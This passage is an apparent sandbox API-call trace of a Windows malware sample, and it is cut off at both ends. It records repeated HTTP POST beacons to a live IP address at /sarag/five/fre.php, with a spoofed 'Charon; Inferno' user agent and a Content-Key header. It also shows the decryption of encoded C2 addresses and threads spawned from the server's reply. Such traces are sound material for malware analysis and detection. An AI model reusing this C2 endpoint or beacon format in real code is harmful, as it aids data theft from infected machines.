0x698528 [0334.025] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.025] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0334.026] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.026] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0334.028] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.030] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0334.031] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.031] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0334.031] GetProcessHeap () returned 0x690000 [0334.031] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0334.031] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0334.031] GetProcessHeap () returned 0x690000 [0334.031] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0334.031] socket (af=2, type=1, protocol=6) returned 0xbcc [0334.032] connect (s=0xbcc, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0334.057] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0334.057] GetProcessHeap () returned 0x690000 [0334.057] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0334.057] GetProcessHeap () returned 0x690000 [0334.057] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0334.058] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0334.059] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0334.059] GetProcessHeap () returned 0x690000 [0334.059] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0334.059] GetProcessHeap () returned 0x690000 [0334.060] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0334.060] GetProcessHeap () returned 0x690000 [0334.060] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0334.060] GetProcessHeap () returned 0x690000 [0334.060] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0334.061] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0334.061] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0334.061] GetProcessHeap () returned 0x690000 [0334.063] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0334.063] GetProcessHeap () returned 0x690000 [0334.064] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0334.064] send (s=0xbcc, buf=0x6ad508*, len=242, flags=0) returned 242 [0334.064] send (s=0xbcc, buf=0x6aba40*, len=159, flags=0) returned 159 [0334.065] GetProcessHeap () returned 0x690000 [0334.065] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0334.065] recv (in: s=0xbcc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0334.146] GetProcessHeap () returned 0x690000 [0334.146] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0334.146] GetProcessHeap () returned 0x690000 [0334.146] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0334.147] GetProcessHeap () returned 0x690000 [0334.147] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0334.147] GetProcessHeap () returned 0x690000 [0334.148] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0334.148] closesocket (s=0xbcc) returned 0 [0334.149] GetProcessHeap () returned 0x690000 [0334.149] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0334.149] GetProcessHeap () returned 0x690000 [0334.149] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0334.149] GetProcessHeap () returned 0x690000 [0334.150] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0334.155] GetProcessHeap () returned 0x690000 [0334.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0334.156] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1918) returned 0xbcc [0334.163] Sleep (dwMilliseconds=0xea60) [0334.164] GetProcessHeap () returned 0x690000 [0334.164] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0334.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.166] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0334.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.173] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0334.181] GetProcessHeap () returned 0x690000 [0334.181] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0334.182] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.182] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0334.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.184] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0334.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.186] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0334.187] GetProcessHeap () returned 0x690000 [0334.187] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0334.188] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.190] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0334.191] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.191] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0334.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.192] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0334.192] GetProcessHeap () returned 0x690000 [0334.192] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0334.193] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.193] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0334.196] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.196] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0334.197] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.197] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0334.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.198] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0334.198] GetProcessHeap () returned 0x690000 [0334.198] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0334.198] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0334.198] GetProcessHeap () returned 0x690000 [0334.199] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0334.199] GetProcessHeap () returned 0x690000 [0334.199] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0334.199] GetProcessHeap () returned 0x690000 [0334.199] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0334.199] GetProcessHeap () returned 0x690000 [0334.199] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0334.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.201] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0334.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.211] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0334.219] GetProcessHeap () returned 0x690000 [0334.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0334.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.220] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0334.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.221] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0334.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.222] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0334.222] GetProcessHeap () returned 0x690000 [0334.223] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0334.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.224] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0334.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.225] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0334.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.226] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0334.226] GetProcessHeap () returned 0x690000 [0334.226] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0334.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.227] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0334.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.230] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0334.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.230] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0334.231] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.231] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0334.231] GetProcessHeap () returned 0x690000 [0334.231] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0334.231] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0334.231] GetProcessHeap () returned 0x690000 [0334.232] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0334.232] socket (af=2, type=1, protocol=6) returned 0xbd0 [0334.232] connect (s=0xbd0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0334.262] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0334.262] GetProcessHeap () returned 0x690000 [0334.262] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0334.262] GetProcessHeap () returned 0x690000 [0334.262] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0334.263] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0334.264] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0334.264] GetProcessHeap () returned 0x690000 [0334.264] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af680 [0334.264] GetProcessHeap () returned 0x690000 [0334.264] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0334.264] GetProcessHeap () returned 0x690000 [0334.265] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0334.265] GetProcessHeap () returned 0x690000 [0334.265] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0334.265] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0334.266] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0334.267] GetProcessHeap () returned 0x690000 [0334.267] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0334.267] GetProcessHeap () returned 0x690000 [0334.267] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0334.268] send (s=0xbd0, buf=0x6ad508*, len=242, flags=0) returned 242 [0334.268] send (s=0xbd0, buf=0x6aba40*, len=159, flags=0) returned 159 [0334.268] GetProcessHeap () returned 0x690000 [0334.268] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0334.268] recv (in: s=0xbd0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0334.351] GetProcessHeap () returned 0x690000 [0334.352] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0334.352] GetProcessHeap () returned 0x690000 [0334.353] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0334.353] GetProcessHeap () returned 0x690000 [0334.353] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af680 | out: hHeap=0x690000) returned 1 [0334.353] GetProcessHeap () returned 0x690000 [0334.354] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0334.354] closesocket (s=0xbd0) returned 0 [0334.355] GetProcessHeap () returned 0x690000 [0334.356] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0334.356] GetProcessHeap () returned 0x690000 [0334.356] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0334.356] GetProcessHeap () returned 0x690000 [0334.357] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0334.357] GetProcessHeap () returned 0x690000 [0334.357] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0334.358] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x191c) returned 0xbd0 [0334.365] Sleep (dwMilliseconds=0xea60) [0334.366] GetProcessHeap () returned 0x690000 [0334.366] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0334.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.367] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0334.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.375] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0334.382] GetProcessHeap () returned 0x690000 [0334.382] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0334.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.383] CryptImportKey (in: hProv=0x6af100, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0334.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.384] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0334.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.385] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0334.385] GetProcessHeap () returned 0x690000 [0334.385] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0334.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.386] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0334.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.390] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0334.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.390] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0334.391] GetProcessHeap () returned 0x690000 [0334.391] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0334.391] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.392] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0334.397] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.397] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0334.398] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.398] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0334.399] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.399] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0334.399] GetProcessHeap () returned 0x690000 [0334.399] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0334.399] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0334.399] GetProcessHeap () returned 0x690000 [0334.400] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0334.400] GetProcessHeap () returned 0x690000 [0334.400] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0334.400] GetProcessHeap () returned 0x690000 [0334.401] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0334.401] GetProcessHeap () returned 0x690000 [0334.401] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0334.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.401] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0334.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.408] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0334.435] GetProcessHeap () returned 0x690000 [0334.435] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0334.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.439] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d028) returned 1 [0334.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.440] CryptSetKeyParam (hKey=0x69d028, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0334.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.440] CryptSetKeyParam (hKey=0x69d028, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0334.440] GetProcessHeap () returned 0x690000 [0334.441] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0334.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.450] CryptDecrypt (in: hKey=0x69d028, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0334.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.452] CryptDestroyKey (hKey=0x69d028) returned 1 [0334.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.454] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0334.454] GetProcessHeap () returned 0x690000 [0334.454] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0334.455] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.456] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0334.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.457] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0334.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.458] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0334.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0334.459] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0334.459] GetProcessHeap () returned 0x690000 [0334.459] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0334.467] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, 